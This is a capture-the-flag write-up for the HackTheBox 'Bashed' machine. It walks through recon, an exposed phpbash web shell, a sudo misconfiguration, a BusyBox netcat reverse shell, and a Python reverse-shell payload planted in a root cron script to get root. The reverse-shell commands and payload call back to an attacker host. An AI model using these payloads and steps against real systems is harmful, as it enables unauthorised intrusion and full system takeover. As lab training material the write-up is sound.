HackTheBox Bashed Writeup

Posted Sep 27, 2024

By x3ric

4 min read

Explore the fundamentals of cybersecurity in the Bashed Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.10.68 bashed.htb

Script to add hosts automatically

  
ip="10.10.10.68"
domain="bashed.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV bashed.htb

  
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 22:23 CEST
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.051s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Directory Discovery

Start by using dirb to scan for directories on Bashed HTB:

dirb http://bashed.htb/

The scan reveals the following directories:

  
==> DIRECTORY: http://bashed.htb/css/                                                                        
==> DIRECTORY: http://bashed.htb/dev/                                                                        
==> DIRECTORY: http://bashed.htb/fonts/                                                                       
==> DIRECTORY: http://bashed.htb/images/                                                                           
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/     

Getting a Shell:

1. Discover the PHP Bash Web Shell

On the website http://bashed.htb/single.html, you’ll find a link to the PHP Bash web shell source code on GitHub:
- https://github.com/Arrexel/phpbash
Access the live PHP Bash web shell on the server:
- http://bashed.htb/dev/phpbash.php

2. Retrieve the User Flag

Once inside the PHP Bash web shell, retrieve the arrexel user flag:

cat /home/arrexel/user.txt

3. Check Sudo Privileges

After gaining access, check the sudo privileges for the current user:

sudo -l

The output reveals:

(scriptmanager : scriptmanager) NOPASSWD: ALL

This means you can execute any command as the scriptmanager user without a password.

4. Find Readable Directories for `scriptmanager`

Locate directories accessible by the scriptmanager user by running:

  
find / -type d -readable -user scriptmanager | grep -v '^/proc\|^/run\|^/sys'

This command lists readable directories for scriptmanager, excluding system directories like /proc, /run, and /sys.

5. Set Up a Reverse Shell Listener

On your attacking machine, set up a listener to catch the reverse shell:

nc -lvnp 9001

6. Initiate a Reverse Shell Using BusyBox

Since the available nc (netcat) version on the target system is netcat-openbsd, which lacks the -e option, you can use BusyBox to achieve a reverse shell. On the target machine, execute:

busybox nc 10.10.14.9 9001 -e /bin/bash

This command establishes a reverse shell connection to your listener on port 9001.

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

  
stty size; stty raw -echo; fg

As the last step, set the terminal environment:

  
export TERM=xterm;

Monitor Processes with `pspy`

Objective: Use pspy to monitor processes without needing root privileges and identify processes being executed by root that may be exploitable.

Step 1: Download `pspy`

On your attacking machine, download the appropriate pspy binary (e.g., pspy64 for 64-bit systems) from the official repository:
- https://github.com/DominicBreuker/pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64

Step 2: Transfer `pspy` to the Target Server Using Python HTTP Server

On your attacking machine, start a Python HTTP server in the directory where pspy64 is located:

python3 -m http.server 8080

On the target machine, download pspy64 using wget:

wget http://<vpn-ip>:8080/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64

Step 3: Run `pspy` to Monitor Processes

Now that pspy64 is on the target machine, run it to monitor running processes:

/tmp/pspy64

While monitoring, pspy may show processes that are periodically executed by root. For example:

2024/09/27 14:02:01 CMD: UID=0     PID=1249   | python test.py

This shows that test.py is executed by root, which could be exploited by modifying the script.

1. Switch to `scriptmanager` User

test.py is owned by scriptmanager, switch to scriptmanager:

sudo -u scriptmanager bash

2. Edit `test.py`

Navigate to the location of test.py, which was identified by pspy, and edit the script to include a Python reverse shell payload:

nano /scripts/test.py

Replace the contents of test.py with the following reverse shell code:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

  
import socket, os, pty
s = socket.socket(); s.connect(("<vpn-ip>", 9002))
for fd in (0, 1, 2): os.dup2(s.fileno(), fd)
pty.spawn("/bin/bash")

3. Set up a Listener

On your local machine (the attacker machine), set up a listener to capture the reverse shell:

nc -lvnp 9002

4. Wait for Execution

The test.py script is executed periodically by root, as observed in pspy. Wait for the next execution, and the reverse shell should connect to your listener.

5. Capture Root Access

Once the reverse shell connects, you should have a shell as root. You can verify this by checking the user and reading sensitive files:

cat /root/root.txt

ctf

This post is licensed under CC BY 4.0 by the author.